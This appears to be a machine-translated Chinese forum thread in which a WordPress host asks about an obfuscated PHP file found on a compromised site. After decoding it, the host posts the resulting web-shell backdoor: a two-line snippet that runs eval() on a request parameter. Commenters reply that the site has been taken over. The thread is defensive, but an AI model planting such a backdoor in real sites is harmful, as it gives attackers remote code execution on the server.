0
我爲小客戶網站運行了幾十個WordPress安裝的VPS。WordPress黑客攻擊
我剛剛注意到一個站點有一個名爲「pnxnfup.php」的php腳本,它內部有一個加載base64字母數字的字符。
在網站的根目錄中還有很多沒有擴展名的文件 - 只是隨機的alphanum字符串 - withih說文件看起來像IP地址正在被記錄 - 我猜這些是訪客IP地址(我的是在那裏)。
任何人都知道這可能是什麼類型的利用?
更新:18/12/12
好,我設法pnxnfup.php的內容進行解碼
當我解碼原始PHP文件,它包含了更多base64編碼的內容穿插着隨機亂碼PHP的評論,我必須手動去除之前,我可以解碼文件的其餘部分。
一旦我解碼,我發現更多base64編碼的字符串與更多亂碼php評論。有一次,我反覆的剝離和解碼過程(!唷)我留下了這一點:
if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));
我明白大致也是這個代碼做什麼(嗅探與ASC參數請求這將表明,可以針對性的URL SQL注入),但我不明白這對黑客自己有什麼價值。我猜想黑客必須滲透得更深,而我錯過了其他的東西?
聽起來像一個破殼輸出重定向嘗試我。 – arkascha
嘗試?看起來你有pwn3d。也許你應該聘請專業人士。 – rook
@Rook - 感謝您的寶貴貢獻:/ –